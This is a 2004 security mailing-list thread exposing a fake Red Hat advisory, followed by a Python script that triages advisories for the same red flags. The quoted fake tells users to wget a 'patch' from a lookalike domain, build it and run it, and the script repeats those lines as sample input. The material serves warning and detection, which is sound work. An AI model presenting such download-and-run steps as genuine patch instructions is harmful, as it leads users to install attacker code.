Message-ID: <20041025090153.GG97718@DAPCVA.da>
From: var at deny-all.com (Vincent Archer)
Subject: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

On Sun, Oct 24, 2004 at 07:51:09PM -0400, Harry Hoffman wrote:
> haha, that's pretty funny. If they were going to do something like that
> it should have at least been in a rpm format.

Considering you can put an executable script inside, if I remember right.

> I'm hoping that this doesn't need to be said but if neither
> "yum check-update || up2date -l" report anything then chances are there
> are no "Official Fedora Updates"
>
> --Harry
>
> Hugo van der Kooij wrote:
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >Be advised.
> >
> >The message below is currently going around on the internet. Being unsigned
> >was the first obvious issue. Not pointing to RPM updates, being in a
> >different format and such were among the other reasons to suspect it.
> >
> >Message was sent from 'University of Texas at Arlington'.
> >
> >I am sure none of you should be fooled by such a message but others might
> >be.
> >
> >And while it lasts you may want to get the file for your own educational
> >purposes.
> >
> >Hugo.
> >- ---------- Forwarded message ----------
> >Date: Sun, 24 Oct 2004 17:22:20 -0500
> >From: RedHat Security Team <security@...hat.com>
> >To: *****************
> >Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
> >
> >
> >[logo_rh_home.png]
> >
> >Original issue date: October 20, 2004
> >Last revised: October 20, 2004
> >Source: RedHat
> >
> >A complete revision history is at the end of this file.
> >
> >Dear RedHat user,
> >
> >Redhat found a vulnerability in fileutils (ls and mkdir), that could
> >allow a remote attacker to execute arbitrary code with root privileges.
> >Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
> >RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
> >known that *BSD and Solaris platforms are NOT affected.
> >
> >The RedHat Security Team strongly advises you to immediately apply the
> >fileutils-1.0.6 patch. This is a critical-critical update that you must
> >make by following these steps:
> >
> > * First download the patch from the Security RedHat mirror: wget
> > www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
> > * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
> > * cd fileutils-1.0.6.patch
> > * make
> > * ./inst
> >
> >Again, please apply this patch as soon as possible or you risk your
> >system and others` to be compromised.
> >
> >Thank you for your prompt attention to this serious matter,
> >
> >RedHat Security Team.
> >
> >Copyright (C) 2004 Red Hat, Inc. All rights reserved.
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
Vincent ARCHER
varcher@...yall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com
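The red flags named in the thread (no signature, no RPM or updater reference, a download host outside the vendor's domain, hand-run build steps) can be checked mechanically when triaging a reported advisory. The following is an added example, not part of the original messages; the `VENDOR_DOMAINS` allowlist, the function names and the abbreviated sample text are assumptions constructed for illustration.

```python
import re

# Assumption for this example: hosts a genuine vendor advisory may link to.
VENDOR_DOMAINS = {"redhat.com"}

LINK_RE = re.compile(r"\b(?:(?:https?|ftp)://|(?=www\.))([a-z0-9.-]+)", re.I)
MANUAL_STEP_RE = re.compile(r"^[\s*]*(?:make|\./\S+)\s*$", re.M)
PACKAGE_RE = re.compile(r"\.rpm\b|\bup2date\b|\byum\b", re.I)


def is_vendor_host(host):
    """Exact domain or a true subdomain; 'fedora-redhat.com' must not pass."""
    host = host.lower().strip(".")
    return any(host == d or host.endswith("." + d) for d in VENDOR_DOMAINS)


def triage(advisory):
    """Return the list of red flags found in an advisory e-mail body."""
    flags = []
    # Armor being present proves nothing by itself; a real check still
    # verifies the signature with gpg against the vendor's published key.
    if "-----BEGIN PGP SIGNATURE-----" not in advisory:
        flags.append("unsigned")
    hosts = {h.lower().strip(".") for h in LINK_RE.findall(advisory)}
    for host in sorted(h for h in hosts if not is_vendor_host(h)):
        flags.append("off-vendor link: " + host)
    if not PACKAGE_RE.search(advisory):
        flags.append("no RPM or updater reference")
    if MANUAL_STEP_RE.search(advisory):
        flags.append("manual build/run steps")
    return flags


# Constructed sample: abbreviated from the forwarded message in the thread.
FAKE = """The RedHat Security Team strongly advises you to immediately apply the
fileutils-1.0.6 patch.
  * First download the patch from the Security RedHat mirror: wget
    www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
  * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
  * cd fileutils-1.0.6.patch
  * make
  * ./inst
"""

if __name__ == "__main__":
    for flag in triage(FAKE):
        print(flag)
```

The subdomain test is the part that matters: a substring or bare suffix match on "redhat.com" would accept the lookalike host used in the forwarded message.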